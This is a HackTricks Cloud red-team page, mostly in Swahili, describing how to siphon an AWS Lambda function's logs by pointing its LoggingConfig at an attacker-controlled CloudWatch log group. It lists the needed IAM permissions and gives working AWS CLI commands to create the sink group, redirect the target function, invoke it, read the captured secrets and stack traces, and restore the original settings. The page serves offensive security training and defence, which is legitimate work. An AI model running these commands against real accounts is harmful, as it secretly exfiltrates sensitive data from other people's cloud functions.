AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Tumia vibaya vigezo vya logging vya hali ya juu vya lambda:UpdateFunctionConfiguration ili kuyaelekeza tena logi za function kwenye CloudWatch Logs log group iliyochaguliwa na mshambuliaji. Hii inafanya kazi bila kubadilisha code au execution role (matawi mengi ya Lambda tayari yanajumuisha logs:CreateLogGroup/CreateLogStream/PutLogEvents kupitia AWSLambdaBasicExecutionRole). Ikiwa function inachapisha secrets/request bodies au inashindwa (crash) na stack traces, unaweza kuzikusanya kutoka kwenye log group mpya.

Ruhusa zinazohitajika

• lambda:UpdateFunctionConfiguration
• lambda:GetFunctionConfiguration
• lambda:InvokeFunction (au kutegemea triggers zilizopo)
• logs:CreateLogGroup (sio lazima mara nyingi ikiwa role ya function ina)
• logs:FilterLogEvents (kusoma events)

Hatua

1. Unda sink log group

aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true

2. Elekeza upya target function logs

aws lambda update-function-configuration \
--function-name <TARGET_FN> \
--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
--region us-east-1

Subiri hadi LastUpdateStatus iwe Successful:

aws lambda get-function-configuration --function-name <TARGET_FN> \
--query LastUpdateStatus --output text

3. Iitisha na usome kutoka kwenye sink

aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
sleep 5
aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text

Athari

• Kuelekeza kwa siri application/system logs zote kwenye log group unayodhibiti, ukiepuka matarajio kwamba logs zitafika tu katika /aws/lambda/<fn>.
• Exfiltrate data nyeti zilizochapishwa na function au zilizoonekana katika errors.

Usafishaji

aws lambda update-function-configuration --function-name <TARGET_FN> \
--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
--region us-east-1 || true

Vidokezo

• Udhibiti wa logging ni sehemu ya Lambda’s LoggingConfig (LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel).
• Kwa chaguo-msingi, Lambda hutuma logs kwenye /aws/lambda/<function>, lakini unaweza kuelekeza kwa jina lolote la log group; Lambda (au execution role) itaunda ikiwa itaruhusiwa.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.